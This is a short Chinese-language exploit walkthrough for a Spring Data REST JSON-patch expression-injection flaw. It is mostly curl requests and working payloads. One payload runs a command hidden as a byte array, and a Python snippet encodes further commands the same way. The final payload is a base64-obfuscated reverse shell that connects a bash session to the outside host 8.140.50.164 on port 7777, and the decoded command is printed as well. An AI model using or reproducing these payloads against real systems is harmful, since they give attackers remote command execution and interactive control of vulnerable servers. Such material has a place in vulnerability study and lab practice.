摘要

框架安全

1.Spring框架漏洞

1
2
curl -X POST -H "Content-Type:application/json-patch+json" -d 
'{"firstname":"si","lastname":"Li"}' http://127.0.0.1:8080/customers
1
2
3
curl -X DELETE -H "Content-Type:application/json-patch+json" -d 
'{"firstname":"si","lastname":"Li"}' http://127.0.0.1:8080/customers/2

修改后:

poc

1
2
3
4
[{ "op": "replace", "path": 
"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(
new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", 
"value": "vulhub" }]

其中new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}表示的命令touch /tmp/success
这是将每个字符转为对应的十进制,可以通过下面的python代码进行转换:

1
2
3
4
payload = b'touch /tmp/success'
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)

反弹shell

1
2
3
[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(
'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MC41MC4xNjQvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}')/lastname", 
"value": "vulhub" }]

bash -i >& /dev/tcp/8.140.50.164/7777 0>&1

base64编码:YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MC41MC4xNjQvNzc3NyAwPiYx